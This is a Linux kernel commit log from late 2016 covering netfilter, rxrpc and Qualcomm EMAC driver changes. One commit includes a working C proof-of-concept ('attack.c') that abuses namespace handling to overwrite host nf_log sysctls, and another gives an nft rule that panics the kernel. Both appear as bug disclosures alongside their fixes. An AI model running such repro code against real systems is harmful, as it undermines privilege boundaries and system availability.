1. 04 Oct, 2016 2 commits
    • Liping Zhang's avatar
      netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Liping Zhang authored
      After I input the following nftables rule, a panic happened on my system:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because divisor is 64-bit, but we treat it as a 32-bit integer,
      then 0xf00000000 becomes zero, i.e. divisor becomes 0.
      Signed-off-by: default avatarLiping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      2fa46c13
    • Jann Horn's avatar
      netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Jann Horn authored
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: default avatarJann Horn <jann@thejh.net>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      dbb5918c
  2. 30 Sep, 2016 28 commits
  3. 29 Sep, 2016 10 commits
    • David Howells's avatar
      rxrpc: Note serial number being ACK'd in the congestion management trace · ed1e8679
      David Howells authored
      Note the serial number of the packet being ACK'd in the congestion
      management trace rather than the serial number of the ACK packet.  Whilst
      the serial number of the ACK packet is useful for matching ACK packet in
      the output of wireshark, the serial number that the ACK is in response to
      is of more use in working out how different trace lines relate.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      ed1e8679
    • David Howells's avatar
      rxrpc: Request more ACKs in slow-start mode · b112a670
      David Howells authored
      Set the request-ACK on more DATA packets whilst we're in slow start mode so
      that we get sufficient ACKs back to supply information to configure the
      window.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      b112a670
    • David Howells's avatar
      rxrpc: Reduce the rxrpc_local::services list to a pointer · 1e9e5c95
      David Howells authored
      Reduce the rxrpc_local::services list to just a pointer as we don't permit
      multiple service endpoints to bind to a single transport endpoints (this is
      excluded by rxrpc_lookup_local()).
      
      The reason we don't allow this is that if you send a request to an AFS
      filesystem service, it will try to talk back to your cache manager on the
      port you sent from (this is how file change notifications are handled).  To
      prevent someone from stealing your CM callbacks, we don't let AF_RXRPC
      sockets share a UDP socket if at least one of them has a service bound.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      1e9e5c95
    • David Howells's avatar
      rxrpc: When activating client conn channels, do state check inside lock · 2629c7fa
      David Howells authored
      In rxrpc_activate_channels(), the connection cache state is checked outside
      of the lock, which means it can change whilst we're waking calls up,
      thereby changing whether or not we're allowed to wake calls up.
      
      Fix this by moving the check inside the locked region.  The check to see if
      all the channels are currently busy can stay outside of the locked region.
      
      Whilst we're at it:
      
       (1) Split the locked section out into its own function so that we can call
           it from other places in a later patch.
      
       (2) Determine the mask of channels dependent on the state as we're going
           to add another state in a later patch that will restrict the number of
           simultaneous calls to 1 on a connection.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      2629c7fa
    • David Howells's avatar
      rxrpc: Make Tx loss-injection go through normal return and adjust tracing · a1767077
      David Howells authored
      In rxrpc_send_data_packet() make the loss-injection path return through the
      same code as the transmission path so that the RTT determination is
      initiated and any future timer shuffling will be done, despite the packet
      having been binned.
      
      Whilst we're at it:
      
       (1) Add to the tx_data tracepoint an indication of whether or not we're
           retransmitting a data packet.
      
       (2) When we're deciding whether or not to request an ACK, rather than
           checking if we're in fast-retransmit mode check instead if we're
           retransmitting.
      
       (3) Don't invoke the lose_skb tracepoint when losing a Tx packet as we're
           not altering the sk_buff refcount nor are we just seeing it after
           getting it off the Tx list.
      
       (4) The rxrpc_skb_tx_lost note is then no longer used so remove it.
      
       (5) rxrpc_lose_skb() no longer needs to deal with rxrpc_skb_tx_lost.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      a1767077
    • David Howells's avatar
      rxrpc: Fix exclusive client connections · 8732db67
      David Howells authored
      Exclusive connections are currently reusable (which they shouldn't be)
      because rxrpc_alloc_client_connection() checks the exclusive flag in the
      rxrpc_connection struct before it's initialised from the function
      parameters.  This means that the DONT_REUSE flag doesn't get set.
      
      Fix this by checking the function parameters for the exclusive flag.
      Signed-off-by: default avatarDavid Howells <dhowells@redhat.com>
      8732db67
    • David S. Miller's avatar
      Merge branch 'qcom-emac-acpi' · 31fbe81f
      David S. Miller authored
      Timur Tabi says:
      
      ====================
      Add basic ACPI support to the Qualcomm Technologies EMAC driver
      
      This patch series adds support to the EMAC driver for extracting addresses,
      interrupts, and some _DSDs (properties) from ACPI.  The first two patches
      clean up the code, and the third patch adds ACPI-specific functionality.
      
      The first patch fixes a bug with handling the platform_device for the
      internal PHY.  This phy is treated as a separate device in both DT and
      ACPI, but since the platform is not released automatically when the
      driver unloads, managed functions like devm_ioremap_resource cannot be
      used.
      
      The second patch replaces of_get_mac_address with its platform-independent
      equivalent device_get_mac_address.
      
      The third patch parses the ACPI tables to obtain the platform_device for
      the primary EMAC node ("QCOM8070") and the internal phy node ("QCOM8071").
      ====================
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      31fbe81f
    • Timur Tabi's avatar
      net: qcom/emac: initial ACPI support · 5f3d3807
      Timur Tabi authored
      Add support for reading addresses, interrupts, and _DSD properties
      from ACPI tables, just like with device tree.  The HID for the
      EMAC device itself is QCOM8070.  The internal PHY is represented
      by a child node with a HID of QCOM8071.
      
      The EMAC also has some complex clock initialization requirements
      that are not represented by this patch.  This will be addressed
      in a future patch.
      Signed-off-by: default avatarTimur Tabi <timur@codeaurora.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      5f3d3807
    • Timur Tabi's avatar
      net: qcom/emac: use device_get_mac_address · 0de709ac
      Timur Tabi authored
      Replace the DT-specific of_get_mac_address() function with
      device_get_mac_address, which works on both DT and ACPI platforms.  This
      change makes it easier to add ACPI support.
      Signed-off-by: default avatarTimur Tabi <timur@codeaurora.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      0de709ac
    • Timur Tabi's avatar
      net: qcom/emac: do not use devm on internal phy pdev · 54e19bc7
      Timur Tabi authored
      The platform_device returned by of_find_device_by_node() is not
      automatically released when the driver unprobes.  Therefore,
      managed calls like devm_ioremap_resource() should not be used.
      Instead, we manually allocate the resources and then free them
      on driver release.
      Signed-off-by: default avatarTimur Tabi <timur@codeaurora.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      54e19bc7